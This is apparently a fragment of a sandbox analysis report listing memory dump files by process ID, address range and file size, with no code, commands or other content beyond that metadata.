                                      • memory/5784-0-0x00000000009F0000-0x0000000000E98000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/5784-4-0x00000000009F0000-0x0000000000E98000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/5784-2-0x00000000009F1000-0x0000000000A59000-memory.dmp

                                        Filesize

                                        416KB

                                      • memory/5784-1-0x0000000077834000-0x0000000077836000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/5784-19-0x00000000009F1000-0x0000000000A59000-memory.dmp

                                        Filesize

                                        416KB

                                      • memory/5784-18-0x00000000009F0000-0x0000000000E98000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/5828-79-0x0000000000410000-0x00000000008C4000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/5828-92-0x0000000000410000-0x00000000008C4000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/6016-7470-0x0000000000960000-0x0000000000DA4000-memory.dmp

                                        Filesize

                                        4.3MB

                                      • memory/6016-7860-0x0000000000960000-0x0000000000DA4000-memory.dmp

                                        Filesize

                                        4.3MB

                                      • memory/6020-13610-0x00000000008F0000-0x0000000000D98000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/6020-13612-0x00000000008F0000-0x0000000000D98000-memory.dmp

                                        Filesize

                                        4.7MB